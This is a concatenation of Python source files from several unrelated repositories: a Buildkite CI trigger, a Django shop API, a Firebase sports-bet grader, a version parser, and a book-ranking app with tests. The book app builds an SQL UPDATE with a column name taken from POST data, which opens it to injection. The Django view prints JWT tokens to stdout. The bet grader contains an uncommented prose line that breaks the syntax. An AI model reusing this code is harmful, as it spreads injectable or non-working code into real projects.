"source": "1sanz/onnxruntime",
"score": 2
} |
#### File: onnxruntime/ci/bkpoke.py
```python
import argparse
import os
import pathlib
import subprocess
import sys
import time
import requests
GET_BUILD_URL = 'https://api.buildkite.com/v2/organizations/plaidml/pipelines/{pipeline}/builds/{number}'
CREATE_BUILD_URL = 'https://api.buildkite.com/v2/organizations/plaidml/pipelines/{pipeline}/builds'
VIEW_BUILD_URL = 'https://buildkite.com/plaidml/{pipeline}/builds/{number}'
def main():
parser = argparse.ArgumentParser()
parser.add_argument('pipeline')
args = parser.parse_args()
token = os.getenv('BUILDKITE_TOKEN')
cwd = os.getenv('CI_PROJECT_DIR')
commit = os.getenv('CI_COMMIT_SHA')
branch = os.getenv('CI_COMMIT_REF_NAME')
message = os.getenv('CI_COMMIT_TITLE')
name = subprocess.check_output(['git', 'show', '-s', '--format=%an', commit], cwd=cwd)
email = subprocess.check_output(['git', 'show', '-s', '--format=%ae', commit], cwd=cwd)
headers = {'Authorization': 'Bearer {}'.format(token)}
payload = {
'commit': commit,
'branch': branch,
'message': message,
'author': {
'name': name.decode().rstrip(),
'email': email.decode().rstrip(),
},
}
params = {
'pipeline': args.pipeline,
}
resp = requests.post(CREATE_BUILD_URL.format(**params), headers=headers, json=payload)
print(resp)
json = resp.json()
print(json)
params['number'] = json['number']
print('{}: {}'.format(json['state'], VIEW_BUILD_URL.format(**params)), flush=True)
while json['finished_at'] is None:
time.sleep(30)
resp = requests.get(GET_BUILD_URL.format(**params), headers=headers)
json = resp.json()
print('.', end='', flush=True)
print('', flush=True)
print('{}: {}'.format(json['state'], VIEW_BUILD_URL.format(**params)), flush=True)
if json['state'] != 'passed':
sys.exit(1)
if __name__ == '__main__':
main()
``` |
{
"source": "1sarah/django_shop",
"score": 2
} |
#### File: 1sarah/django_shop/send_sms.py
```python
import os
import africastalking
from django_shop.settings import env
from twilio.rest import Client
def send(message, to_phone_number):
# the following line needs your Twilio Account SID and Auth Token
ACCOUNT_SID = env.str('ACCOUNT_SID')
TOKEN = env.str('TOKEN')
client = Client(ACCOUNT_SID, TOKEN)
# change the "from_" number to your Twilio number and the "to" number
# to the phone number you signed up for Twilio with, or upgrade your
# account to send SMS to any phone number
client.messages.create(to=to_phone_number,
from_="+14804050909",
body=message)
def send_sms(message, recipients):
username = "sandbox"
api_key = env.str('SMS_API_KEY')
africastalking.initialize(username, api_key)
sms = africastalking.SMS
try:
response = sms.send(message, recipients)
print(response)
except Exception as e:
print(f"======================Something went wrong {e}===================================")
```
#### File: django_shop/shop/models.py
```python
from django.contrib.auth.models import AbstractBaseUser, UserManager, PermissionsMixin
from django.db import models
from django.utils.translation import gettext_lazy as _
class Customer(models.Model):
name = models.CharField(max_length=200)
code = models.IntegerField(null=True)
phone_number = models.CharField(max_length=50, null=True)
def __str__(self):
return self.name
class Order(models.Model):
customer = models.ForeignKey(Customer, on_delete=models.CASCADE,
related_name='orders', blank=True, null=True)
item = models.CharField(max_length=250, null=True)
amount = models.IntegerField(null=True)
time = models.DateTimeField(auto_now_add=True, null=True)
def __str__(self):
return self.item
class User(AbstractBaseUser, PermissionsMixin):
email = models.EmailField(_('email address'), unique=True)
username = models.CharField(max_length=80)
is_superuser = models.BooleanField(default=False)
is_staff = models.BooleanField(default=False)
is_active = models.BooleanField(default=True)
tokenn = models.CharField(max_length=300)
objects = UserManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['username']
def __str__(self):
return self.email
```
#### File: django_shop/shop/views.py
```python
import rest_framework.decorators
from rest_framework.decorators import api_view, permission_classes, authentication_classes
from django.contrib.auth.models import update_last_login
from django.http import JsonResponse
from requests.models import Response
from rest_framework import status
from rest_framework.generics import ListCreateAPIView, RetrieveUpdateDestroyAPIView
from rest_framework.permissions import AllowAny
from rest_framework.response import Response
from rest_framework.settings import api_settings
from rest_framework_jwt.settings import api_settings
from rest_framework.views import APIView
from social_core.backends.oauth import BaseOAuth1, BaseOAuth2
from social_core.exceptions import MissingBackend
from social_django.utils import load_backend, load_strategy
from rest_framework.permissions import IsAuthenticated
from rest_framework_jwt.authentication import JSONWebTokenAuthentication
from .models import Customer, Order
from .serializers import CustomerSerializer, OrderSerializer, UserLoginSerializer, UserSerializer, SocialAuthSerializer
JWT_PAYLOAD_HANDLER = api_settings.JWT_PAYLOAD_HANDLER
JWT_ENCODE_HANDLER = api_settings.JWT_ENCODE_HANDLER
@permission_classes((IsAuthenticated,))
@authentication_classes((JSONWebTokenAuthentication,))
class CustomerListCreateAPIView(ListCreateAPIView):
"""
API view to retrieve list of customers or create new
"""
serializer_class = CustomerSerializer
queryset = Customer.objects.all()
@permission_classes((IsAuthenticated,))
@authentication_classes((JSONWebTokenAuthentication,))
class CustomerDetailsAPIView(RetrieveUpdateDestroyAPIView):
"""
API view to retrieve, update or delete customer
"""
serializer_class = CustomerSerializer
queryset = Customer.objects.all()
@permission_classes((IsAuthenticated,))
@authentication_classes((JSONWebTokenAuthentication,))
class OrderListCreateAPIView(ListCreateAPIView):
"""
API view to retrieve list of orders or create new
"""
serializer_class = OrderSerializer
queryset = Order.objects.all()
@permission_classes((IsAuthenticated,))
@authentication_classes((JSONWebTokenAuthentication,))
class OrderDetailsAPIView(RetrieveUpdateDestroyAPIView):
"""
API view to retrieve, update or delete order
"""
serializer_class = OrderSerializer
queryset = Order.objects.all()
@permission_classes((IsAuthenticated,))
@authentication_classes((JSONWebTokenAuthentication,))
class CreateOrderAPIView(APIView):
serializer_class = OrderSerializer
def post(request, customer_pk):
# customer_pk = request.data.get("customer_pk")
request.data['customer'] = customer_pk
serializer = OrderSerializer(data=request.data)
if serializer.is_valid():
order = serializer.save()
# data to return
customer = order.customer
serializer.data['customer'] = customer
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@rest_framework.decorators.api_view(['POST'])
def social_login(request):
serializer_class = SocialAuthSerializer
serializer = serializer_class(data=request.data)
serializer.is_valid(raise_exception=True)
authenticated_user = request.user if not request.user.is_anonymous else None
provider = serializer.data.get('provider')
strategy = load_strategy(request)
try:
backend = load_backend(
strategy=strategy, name=provider, redirect_uri=None)
except MissingBackend:
return JsonResponse({"error": "Provider invalid or not supported"},
status=status.HTTP_404_NOT_FOUND)
if isinstance(backend, BaseOAuth1):
tokenn = {
'oauth_token': serializer.data.get('access_token'),
'oauth_token_secret': serializer.data.get('access_token_secret')
}
elif isinstance(backend, BaseOAuth2):
tokenn = serializer.data.get('access_token')
try:
user = backend.do_auth(tokenn, user=authenticated_user)
except BaseException as e:
return JsonResponse({"error": "Invalid credentials"}, status=status.HTTP_400_BAD_REQUEST)
if user:
user.is_verified = True
# user.token = functionto generate token
payload = JWT_PAYLOAD_HANDLER(user)
jwt_token = JWT_ENCODE_HANDLER(payload)
user.tokenn = jwt_token
print("+" * 10)
print(jwt_token)
user.save()
update_last_login(None, user)
serializer = UserSerializer(user)
serializer.instance = user
# import pdb;pdb.set_trace()
return JsonResponse(serializer.data, status=status.HTTP_200_OK)
@rest_framework.decorators.api_view(['GET', 'POST'])
def UserLoginView(request):
permission_classes = (AllowAny,)
serializer_class = UserLoginSerializer
serializer = serializer_class(data=request.data)
serializer.is_valid(raise_exception=True)
response = {
'success': 'True',
'status code': status.HTTP_200_OK,
'message': 'User logged in successfully',
'tokenn': serializer.data['tokenn'],
}
status_code = status.HTTP_200_OK
return Response(response, status=status_code)
``` |
{
"source": "1scotthp/swe-sports-scores-backend",
"score": 3
} |
#### File: 1scotthp/swe-sports-scores-backend/main.py
```python
from curses.ascii import NUL
from dataclasses import dataclass
from sqlite3 import Date
from jinja2 import Undefined
import requests
import json
import firebase_admin
from firebase_admin import credentials
from firebase_admin import db
from firebase_admin import firestore
from datetime import timedelta
import dataclasses
leagueDict = {
"basketball_nba": 7422,
"football_nfl": 0,
"football_ncaa": 0,
"basketball_ncaab": 7423,
"icehockey_nhl": 7588,
}
pageDict = {
"basketball_nba": 35
}
class EnhancedJSONEncoder(json.JSONEncoder):
def default(self, o):
if dataclasses.is_dataclass(o):
return dataclasses.asdict(o)
return super().default(o)
@dataclass
class Game:
home_team: str
home_score: str
away_team: str
away_score: str
date: Date
def load_data(sport: str):
url = "https://sportscore1.p.rapidapi.com/events/search"
tomorrow = Date.today() + timedelta(days=1)
yesterday = Date.today() - timedelta(days=1)
querystring = {"date_end": tomorrow, "date_start": yesterday, "status": "finished",
"league_id": leagueDict[sport]}
headers = {
'x-rapidapi-host': "sportscore1.p.rapidapi.com",
'x-rapidapi-key': "<KEY>"
}
response = requests.request(
"POST", url, headers=headers, params=querystring)
process_data(response.text, sport)
# writing to a file, should be writing to firebase?
# with open('json_data.json', 'w') as outfile:
# json.dump(response.text, outfile)
def process_data(d, sport):
#
# with open('json_data.json') as json_file:
# data = json.loads(json.load(json_file))["data"]
data = json.loads(d)["data"]
game_array = {}
i = 0
for game in data:
# print(game)
if game['status'] == 'finished':
g = Game(home_team=game['home_team']['name'], away_team=game['away_team']['name'],
home_score=game['home_score']['current'], away_score=game['away_score']['current'], date=game['start_at'])
game_array[i] = dataclasses.asdict(g)
i += 1
ref = db.reference('results/' + sport + "/")
ref.set(game_array)
## FOR RETURN VALUES
## first boolean is true if bet was graded
## second boolean is true if bet was correct
def grade_one_bet(results, bet):
# print("BET", bet, type(bet))
# print("RESULTS", type(results))
for game in results:
# print("GAME", results)
# print(json.loads(game), type(json.loads(game)))
if bet['winTeam'] == game['home_team'] and bet['loseTeam'] == game['away_team']:
if game['home_score'] > game['away_score']: # correct
return True, True
else: # incorrect
return True, False
elif bet['winTeam'] == game['away_team'] and bet['loseTeam'] == game['home_team']:
if game['home_score'] < game['away_score']: # correct
return True, True
else: # incorrect
return True, False
else:
return False, False
def grade_bets(sport):
ref = db.reference('results/' + sport + "/")
results = ref.get()
db_firestore = firestore.client()
docs = db_firestore.collection(u'users').stream()
i = 0
for doc in docs:
user = doc.to_dict()
open_bets = user["open_bets"] # get all bets for a user
streak = user["streak"] if "streak" in user.keys() else 0
i+=1
still_open_bets = []
new_graded_bets = []
new_wins = 0
new_losses = 0
for bet in open_bets: # check to see if the game happened
graded = False
if results is not None:
go over all result games for every game we are grading
for game in results:
if bet['win'] == game['home_team'] and bet['lose'] == game['away_team']:
if game['home_score'] > game['away_score']: # correct
new_wins += 1
streak = calculate_streak(streak, 1)
else: # incorrect
new_losses += 1
streak = calculate_streak(streak, -1)
graded = True
break
elif bet['win'] == game['away_team'] and bet['lose'] == game['home_team']:
if game['home_score'] < game['away_score']: # correct
new_wins += 1
streak = calculate_streak(streak, 1)
else: # incorrect
new_losses += 1
streak = calculate_streak(streak, -1)
graded = True
break
if not graded:
still_open_bets.append(bet)
else:
new_graded_bets.append(bet)
userRef = db_firestore.collection(u'users').document(doc.id)
if new_wins > -1 or new_losses > 0:
newUser = {
"open_bets": still_open_bets,
"graded_bets": user["graded_bets"] + new_graded_bets,
"losses": user["losses"] + new_losses,
"wins": user["wins"] + new_wins,
"username": user['username'],
"phoneNumber": user['phoneNumber'],
"group_chats": user["group_chats"],
"streak": streak
}
userRef.set(
newUser
)
# this could already be in a designated place yeah thats actually way bete
ref = db.reference('chats/public/')
allChats = ref.get()
graded_bets = []
still_active_bets = []
for chat in allChats:
for data in allChats[chat]:
if data == "picks":
if "active" in allChats[chat][data] and results != None:
for bet in allChats[chat][data]["active"]:
print(grade_one_bet(bet=allChats[chat][data]["active"][bet], results=results))
# based on return values update the active/completed bets in a group chat
#
# go through the active picks and maybe move them over
# if results[chat] != None:
# for message in results[chat]["picks"]["active"]:
# print(message, results[chat]["picks"]["active"][message])
cred = credentials.Certificate(
"swe-sports-firebase-firebase-adminsdk-9lnlp-54450378e3.json")
firebase_admin.initialize_app(cred, {
'databaseURL': 'https://swe-sports-firebase-default-rtdb.firebaseio.com/'
})
def load_all():
sport_arr = ["basketball_nba", "icehockey_nhl"]
for s in sport_arr:
load_data(s)
# process_data(s)
def grade_all():
sport_arr = ["basketball_nba", "icehockey_nhl", "basketball_ncaab"]
for s in sport_arr:
grade_bets(s)
def calculate_streak(streak, operation):
"""
Params:
streak: current user's streak
operation: 1 if bet hits, -1 if bet doesn't hit
If streak is positive and bet hits it will increment streak
If streak is negative and bet hits it will assign it 1
If streak is positive and bet misses it will assign it -1
If streak is negative and bet misses it will decrement streak
"""
return operation if (streak * operation) < 0 else (streak + operation)
def main(event, context):
# load_all()
grade_all()
if __name__ == '__main__':
main(1, 1)
``` |
{
"source": "1set/but",
"score": 3
} |
#### File: full/script/utils.py
```python
import re
import sys
pattern_flag = re.IGNORECASE
pattern_map = {
"go": re.compile(r"go(\d+)\.(\d+)(\.(\d+))?\s", pattern_flag),
"python": re.compile(r"^Python\s+(\d+)\.(\d+)(\.(\d+))?$", pattern_flag),
"pip": re.compile(r"^pip\s+(\d+)\.(\d+)(\.(\d+))?\s", pattern_flag),
"node": re.compile(r"^v(\d+)\.(\d+)(\.(\d+))?$", pattern_flag),
"npm": re.compile(r"^(\d+)\.(\d+)(\.(\d+))?$", pattern_flag),
}
def version_string(version):
if version is None:
return ""
return str.join(".", [str(n) for n in version])
def extract_version(lang, raw):
if lang not in pattern_map:
return None
pattern = pattern_map[lang]
found = pattern.search(raw)
if found is None:
return None
match = found.groups()
version = []
for s in match:
if s is not None and not s.startswith("."):
version.append(int(s))
return tuple(version)
def parse_version_from_stdin():
# read from stdin
lines = []
for line in sys.stdin:
lines.append(line.strip())
# parse all lines
versions = {}
for l in lines:
parts = l.split(":", 1)
lang = parts[0].lower()
raw_version = parts[1].strip()
version = extract_version(lang, raw_version)
if version is not None and len(version) >= 1:
versions[lang] = version
return versions
``` |
{
"source": "1shooperman/gr-sorter",
"score": 3
} |
#### File: sorter/lib/asset_handler.py
```python
import os
def asset(asset_path):
'''
Get the file contents and header_type
return (file contents as string, headers)
'''
asset_file = os.path.abspath(asset_path)
if os.path.isfile(asset_file) is True:
if '.js' in asset_path:
header_type = 'application/javascript; charset=utf-8'
elif '.css' in asset_path:
header_type = 'text/css; charset=utf-8'
else:
header_type = 'text/plain; charset=utf-8'
with open(asset_file, 'r') as myfile:
data = myfile.read()
myfile.close()
else:
data = None
header_type = 'text/plain; charset=utf-8'
return (data, header_type)
```
#### File: sorter/lib/bootstrap.py
```python
import os
from sorter.lib.first_run import init
def bootstrap(db_name, logger):
'''
Bootstrap the application / db / etc
'''
db_file = os.path.abspath(db_name)
if os.path.isfile(db_file) is False:
logger.info('First run, initializing application')
init(db_file)
return db_file
```
#### File: sorter/lib/data_handler.py
```python
import os
from sorter.lib.db import DB
from sorter.lib.book_utils import get_by_id, get_by_isbn
from sorter.lib.parse_xml import parse_isbn13_response, parse_id_response
def store_data(books, db_file):
'''
Store the book data in the provided database
'''
database = DB(db_file)
database.create_connection()
query = '''INSERT INTO rankings(id, isbn, isbn13, title,
image_url, publication_year, ratings_count, average_rating,
author, link) VALUES(?,?,?,?,?,?,?,?,?,?)'''
for book in books:
database.insertupdate(query, book)
database.close_connection()
def get_books(db_file):
'''
Get the previously stored books data
'''
database = DB(db_file)
database.create_connection()
books = database.query('select * from rankings')
database.close_connection()
return books
def get_books_with_missing_data(db_file):
'''
Get the previously stored books data
'''
database = DB(db_file)
database.create_connection()
books = database.query('select * from rankings where publication_year is null')
database.close_connection()
return books
def dump_data(db_file):
'''
Delete the provided data file
'''
if os.path.isfile(db_file):
os.remove(db_file)
def clean_data(db_name, defaults):
'''
Plug in missing data:
book[0] = ID
book[1] = ISBN
book[2] = ISBN13
book[3] = title
book[4] = image url
book[5] = pub year
book[6] = Total Ratings
book[7] = avg rating
book[8] = author
book[9] = link
'''
db_file = os.path.abspath(db_name)
if os.path.isfile(db_file):
books = get_books_with_missing_data(db_file)
map(update_book, books, ([db_file] * len(books)), ([defaults] * len(books)))
def update_book(book, db_file, defaults):
'''
Add the missing book data
'''
qry = None
if book[2] is not None:
xml_response = get_by_isbn(book[2], defaults)
new_book = parse_isbn13_response(xml_response)
qry = 'UPDATE rankings set publication_year = ? where isbn13 = ?'
vals = [new_book[5], book[2]]
elif book[0] is not None:
xml_response = get_by_id(book[0], defaults)
new_book = parse_id_response(xml_response)
qry = 'UPDATE rankings set publication_year = ?, isbn = ?, isbn13 = ? where id = ?'
vals = [new_book[5], new_book[1], new_book[2], book[0]]
if qry is not None:
database = DB(db_file)
database.create_connection()
database.insertupdate(qry, vals)
database.close_connection()
def manually_update_books(data, db_file):
'''
Update books based on parsed POST data
'''
database = DB(db_file)
database.create_connection()
for book in data:
if book['attr'] == 'id':
continue
qry = 'UPDATE rankings set %s = ? where id = ?' % book['attr']
vals = [book['value'], int(book['book_id'])]
database.insertupdate(qry, vals)
database.close_connection()
```
#### File: tests/unit/test_data_handler.py
```python
from sorter.lib.data_handler import *
import sqlite3
from sorter.lib.defaults import Defaults
defaults = Defaults('FOO_KEY', 1, ['BAR-SHELF'])
CREATE_RANKINGS = '''CREATE TABLE rankings
(id PRIMARY KEY, isbn UNIQUE, isbn13 UNIQUE, title, image_url,
publication_year INTEGER, ratings_count INTEGER, average_rating FLOAT,
author, link, preference_adjustment FLOAT DEFAULT 0.0)'''
class fake_os(object):
def __init__(self):
self.called_remove = None
def remove(self, file):
self.called_remove = file
class fake_db(object):
def __init__(self, foo):
self.conn = foo
def create_connection(self):
pass
def insertupdate(self, foo, bar):
pass
def close_connection(self):
pass
def query(self):
pass
class wrapped_db(object):
def __init__(self, database):
self.database = database
def create_connection(self):
pass
def insertupdate(self, query, vals):
self.database.insertupdate(query, vals)
def close_connection(self):
pass
def query(self):
pass
class fake_data_handler(object):
def __init__(self):
self.called_get_books_with_missing_data = False
self.called_update_book = False
self.called_get_by_isbn = False
self.called_parse_isbn13_response = False
self.called_get_by_id = False
self.called_parse_id_response = False
def get_books_with_missing_data(self, *args):
self.called_get_books_with_missing_data = True
return [[1],[2],[3],[4],[5]]
def update_book(self, *args):
self.called_update_book = True
return None
def get_by_isbn(self, *args):
self.called_get_by_isbn = True
def parse_isbn13_response(self, *args):
self.called_parse_isbn13_response = True
def get_by_id(self, *args):
self.called_get_by_id = True
def parse_id_response(self, *args):
self.called_parse_id_response = True
class TestDataHandler(object):
def test_store_data(self, monkeypatch):
database = sqlite3.connect(':memory:')
qry = CREATE_RANKINGS
database.execute(qry)
monkeypatch.setattr("sorter.lib.data_handler.DB", fake_db)
monkeypatch.setattr("sorter.lib.data_handler.DB.create_connection", lambda foo: database)
monkeypatch.setattr("sorter.lib.data_handler.DB.insertupdate", lambda self, foo, bar: database.execute(foo,bar))
fake_data = [(1,2,3,4,5,6,7,8,9,10)]
store_data(fake_data, "foo")
fake_data_returned = database.execute("select * from rankings").fetchall()
database.close()
database = None
assert [fake_data[0] + (0.0,)] == fake_data_returned
def test_get_books(self, monkeypatch):
database = sqlite3.connect(':memory:')
qry = CREATE_RANKINGS
database.execute(qry)
monkeypatch.setattr("sorter.lib.data_handler.DB", fake_db)
monkeypatch.setattr("sorter.lib.data_handler.DB.create_connection", lambda foo: database)
monkeypatch.setattr("sorter.lib.data_handler.DB.query", lambda self, foo: database.execute(foo).fetchall())
fake_book = (1,2,3,4,5,6,7,8,9,10,1.2)
query = '''INSERT INTO rankings(id, isbn, isbn13, title,
image_url, publication_year, ratings_count, average_rating,
author, link, preference_adjustment) VALUES(?,?,?,?,?,?,?,?,?,?,?)'''
database.execute(query, fake_book)
fake_data_returned = get_books("foo")
database.close()
database = None
assert fake_data_returned == [fake_book]
def test_dump_data(self, monkeypatch):
faker = fake_os()
monkeypatch.setattr("sorter.lib.data_handler.os.remove", lambda file: faker.remove(file))
monkeypatch.setattr("sorter.lib.data_handler.os.path.isfile", lambda file: True)
dump_data("fake.file")
assert faker.called_remove == "fake.file"
def test_get_books_with_missing_data(self, monkeypatch):
database = sqlite3.connect(':memory:')
qry = CREATE_RANKINGS
database.execute(qry)
monkeypatch.setattr("sorter.lib.data_handler.DB", fake_db)
monkeypatch.setattr("sorter.lib.data_handler.DB.create_connection", lambda foo: database)
monkeypatch.setattr("sorter.lib.data_handler.DB.query", lambda self, foo: database.execute(foo).fetchall())
fake_books = [(1,2,3,4,5,6,7,8,9,10),
(11,12,13,14,15,None,17,18,19,20),
(21,22,23,24,25,26,27,28,29,30),
(31,32,33,34,35,None,37,38,39,40)]
query = '''INSERT INTO rankings(id, isbn, isbn13, title,
image_url, publication_year, ratings_count, average_rating,
author, link) VALUES(?,?,?,?,?,?,?,?,?,?)'''
for fake_book in fake_books:
database.execute(query, fake_book)
fake_data_returned = get_books_with_missing_data("foo")
database.close()
database = None
assert fake_data_returned == [fake_books[1] + (0.0,), fake_books[3] + (0.0,)]
def test_clean_data(self, monkeypatch):
fdh = fake_data_handler()
monkeypatch.setattr('sorter.lib.data_handler.os.path.abspath', lambda *args: "Foo")
monkeypatch.setattr('sorter.lib.data_handler.os.path.isfile', lambda *args: True)
monkeypatch.setattr('sorter.lib.data_handler.update_book', fdh.update_book)
monkeypatch.setattr('sorter.lib.data_handler.get_books_with_missing_data', fdh.get_books_with_missing_data)
clean_data('Bar', defaults)
assert fdh.called_get_books_with_missing_data is True
assert fdh.called_update_book is True
def test_update_book_given_isbn(self, monkeypatch):
fdh = fake_data_handler()
monkeypatch.setattr('sorter.lib.data_handler.get_by_isbn', fdh.get_by_isbn)
monkeypatch.setattr('sorter.lib.data_handler.parse_isbn13_response', lambda *args: (11,12,13,14,15,4242,17,18,19,20))
monkeypatch.setattr('sorter.lib.data_handler.get_by_id', fdh.get_by_id)
monkeypatch.setattr('sorter.lib.data_handler.parse_id_response', fdh.parse_id_response)
from sorter.lib.db import DB
database = DB(':memory:')
database.create_connection()
monkeypatch.setattr("sorter.lib.data_handler.DB", lambda *args: wrapped_db(database))
qry = CREATE_RANKINGS
database.execute(qry)
fake_books = [( 1, 2, 3, 4, 5, 6, 7, 8, 9,10),
(11,12,13,14,15,16,17,18,19,20),
(21,22,23,24,25,26,27,28,29,30),
(31,32,33,34,35,36,37,38,39,40)]
query = '''INSERT INTO rankings(id, isbn, isbn13, title,
image_url, publication_year, ratings_count, average_rating,
author, link) VALUES(?,?,?,?,?,?,?,?,?,?)'''
for fake_book in fake_books:
database.insertupdate(query, fake_book)
update_book((11,12,13,14,15,16,17,18,19,20), 'foo', defaults)
test_books = database.query('select * from rankings where id = 11')
database.close_connection()
database = None
assert test_books[0][0] == 11
assert test_books[0][1] == 12
assert test_books[0][2] == 13
assert test_books[0][3] == 14
assert test_books[0][4] == 15
assert test_books[0][5] == 4242
assert test_books[0][6] == 17
assert test_books[0][7] == 18
assert test_books[0][8] == 19
assert test_books[0][9] == 20
assert fdh.called_get_by_isbn is True
assert fdh.called_get_by_id is False
assert fdh.called_parse_id_response is False
def test_update_book_given_id(self, monkeypatch):
fdh = fake_data_handler()
monkeypatch.setattr('sorter.lib.data_handler.get_by_isbn', fdh.get_by_isbn)
monkeypatch.setattr('sorter.lib.data_handler.parse_isbn13_response', fdh.parse_isbn13_response)
monkeypatch.setattr('sorter.lib.data_handler.get_by_id', fdh.get_by_id)
monkeypatch.setattr('sorter.lib.data_handler.parse_id_response', lambda *args: (1,999,9999,4,5,1942,7,8,9,10))
from sorter.lib.db import DB
database = DB(':memory:')
database.create_connection()
monkeypatch.setattr("sorter.lib.data_handler.DB", lambda *args: wrapped_db(database))
qry = CREATE_RANKINGS
database.execute(qry)
fake_books = [( 1, 2, 3, 4, 5, 6, 7, 8, 9,10),
(11,12,13,14,15,16,17,18,19,20),
(21,22,23,24,25,26,27,28,29,30),
(31,32,33,34,35,36,37,38,39,40)]
query = '''INSERT INTO rankings(id, isbn, isbn13, title,
image_url, publication_year, ratings_count, average_rating,
author, link) VALUES(?,?,?,?,?,?,?,?,?,?)'''
for fake_book in fake_books:
database.insertupdate(query, fake_book)
update_book((1,None,None,4,5,6,7,8,9,10), 'foo', defaults)
test_books = database.query('select * from rankings where id = 1')
database.close_connection()
database = None
assert test_books[0][0] == 1
assert test_books[0][1] == 999
assert test_books[0][2] == 9999
assert test_books[0][3] == 4
assert test_books[0][4] == 5
assert test_books[0][5] == 1942
assert test_books[0][6] == 7
assert test_books[0][7] == 8
assert test_books[0][8] == 9
assert test_books[0][9] == 10
assert fdh.called_get_by_isbn is False
assert fdh.called_parse_isbn13_response is False
assert fdh.called_get_by_id is True
def test_manually_update_book_all_fields(self, monkeypatch):
from sorter.lib.db import DB
database = DB(':memory:')
database.create_connection()
monkeypatch.setattr("sorter.lib.data_handler.DB", lambda *args: wrapped_db(database))
qry = CREATE_RANKINGS
database.execute(qry)
fake_books = [( 1, 2, 3, 4, 5, 6, 7, 8, 9,10),
(11,12,13,14,15,16,17,18,19,20),
(21,22,23,24,25,26,27,28,29,30),
(31,32,33,34,35,36,37,38,39,40)]
query = '''INSERT INTO rankings(id, isbn, isbn13, title,
image_url, publication_year, ratings_count, average_rating,
author, link) VALUES(?,?,?,?,?,?,?,?,?,?)'''
for fake_book in fake_books:
database.insertupdate(query, fake_book)
to_update = [
{
'book_id': 1,
'attr': 'isbn',
'value': 'foo'
},
{
'book_id': 1,
'attr': 'isbn13',
'value': 'bar'
},
{
'book_id': 1,
'attr': 'title',
'value': 'baz'
},
{
'book_id': 1,
'attr': 'image_url',
'value': 'bang'
},
{
'book_id': 1,
'attr': 'publication_year',
'value': 1980
},
{
'book_id': 1,
'attr': 'ratings_count',
'value': 56
},
{
'book_id': 1,
'attr': 'average_rating',
'value': 57
},
{
'book_id': 1,
'attr': 'author',
'value': 'ipsum'
},
{
'book_id': 1,
'attr': 'link',
'value': 'dolet'
},
{
'book_id': 1,
'attr': 'preference_adjustment',
'value': 12
},
{
'book_id': 11,
'attr': 'ISBN13',
'value': 'brown'
}
]
manually_update_books(to_update, 'foo')
test_books = database.query('select * from rankings where id in (1,11,21,31)')
database.close_connection()
database = None
assert test_books[0] == (1, 'foo', 'bar', 'baz', 'bang', 1980, 56, 57, 'ipsum', 'dolet', 12.0)
assert test_books[1] == (11,12,'brown',14,15,16,17,18,19,20,0.0)
assert test_books[2] == (21,22,23,24,25,26,27,28,29,30,0.0)
assert test_books[3] == (31,32,33,34,35,36,37,38,39,40,0.0)
def test_manually_update_book_id_noupdate(self, monkeypatch):
from sorter.lib.db import DB
database = DB(':memory:')
database.create_connection()
monkeypatch.setattr("sorter.lib.data_handler.DB", lambda *args: wrapped_db(database))
qry = CREATE_RANKINGS
database.execute(qry)
fake_books = [( 1, 2, 3, 4, 5, 6, 7, 8, 9,10)]
query = '''INSERT INTO rankings(id, isbn, isbn13, title,
image_url, publication_year, ratings_count, average_rating,
author, link) VALUES(?,?,?,?,?,?,?,?,?,?)'''
for fake_book in fake_books:
database.insertupdate(query, fake_book)
to_update = [
{
'book_id': 1,
'attr': 'id',
'value': 'foo'
}
]
manually_update_books(to_update, 'foo')
test_books = database.query('select * from rankings where id = 1')
database.close_connection()
database = None
assert test_books[0] == (1, 2, 3, 4, 5, 6, 7, 8, 9, 10,0.0)
```
#### File: tests/unit/test_defaults.py
```python
import tempfile
import os
from urlparse import parse_qs, urlsplit
from sorter.lib.defaults import Defaults
class TestDefaults(object):
def test_get_book_url(self):
defaults = Defaults('http://FAKE.GLTD')
api_url = defaults.get_book_url(12345, 'http://FAKE.GLTD/FAKER?id=%s&key=%s')
_, _, path, query, _ = urlsplit(api_url)
params = parse_qs(query)
assert params['id'][0] == '12345'
assert params['key'][0] == 'None'
def test_get_search_url(self):
defaults = Defaults('http://FAKE.GLTD')
api_url = defaults.get_search_url(54321, 'http://FAKE.GLTD/FAKER?isbn=%s&key=%s')
_, _, path, query, _ = urlsplit(api_url)
params = parse_qs(query)
assert params['isbn'][0] == '54321'
assert params['key'][0] == 'None'
def test_get_book_url_nouri(self):
defaults = Defaults('http://FAKE.GLTD')
api_url = defaults.get_book_url(12345)
_, _, path, query, _ = urlsplit(api_url)
assert path == "/book/show/12345.xml"
assert query == "key=None"
def test_get_search_url_nouri(self):
defaults = Defaults('http://FAKE.GLTD')
api_url = defaults.get_search_url(54321)
_, _, path, query, _ = urlsplit(api_url)
assert path == "/search"
assert query == "q=54321&format=xml&key=None"
def test_is_test(self, monkeypatch):
defaults = Defaults('http://FAKE.GLTD', 'FOO_KEY')
monkeypatch.setattr('os.environ', {'WEBPY_END': 'foo'})
bar = Defaults.is_test()
assert bar is False
def test_get_list_url(self):
defaults = Defaults('http://FAKE.GLTD')
api_url = defaults.get_list_url(98765, ['foo-shelf'], 9, 'http://FAKE.GLTD/FAKER?user_id=%s&key=%s&shelf=%s&per_page=%s')
_, _, path, query, _ = urlsplit(api_url)
params = parse_qs(query)
assert params['user_id'][0] == '98765'
assert params['key'][0] == 'None'
assert params['shelf'][0] == 'foo-shelf'
assert params['per_page'][0] == '9'
def test_get_list_url_noshelves(self):
defaults = Defaults('http://FAKE.GLTD', None, None, ['bar-shelf'])
api_url = defaults.get_list_url(98765, None, 9, 'http://FAKE.GLTD/FAKER?user_id=%s&key=%s&shelf=%s&per_page=%s')
_, _, path, query, _ = urlsplit(api_url)
params = parse_qs(query)
assert params['user_id'][0] == '98765'
assert params['key'][0] == 'None'
assert params['shelf'][0] == 'bar-shelf'
assert params['per_page'][0] == '9'
def test_get_list_url_noperpage(self):
defaults = Defaults('http://FAKE.GLTD', None, 42)
api_url = defaults.get_list_url(98765, ['foo-shelf'], None, 'http://FAKE.GLTD/FAKER?user_id=%s&key=%s&shelf=%s&per_page=%s')
_, _, path, query, _ = urlsplit(api_url)
params = parse_qs(query)
assert params['user_id'][0] == '98765'
assert params['key'][0] == 'None'
assert params['shelf'][0] == 'foo-shelf'
assert params['per_page'][0] == '42'
def test_get_list_url_nouri(self):
defaults = Defaults('http://FAKE.GLTD/')
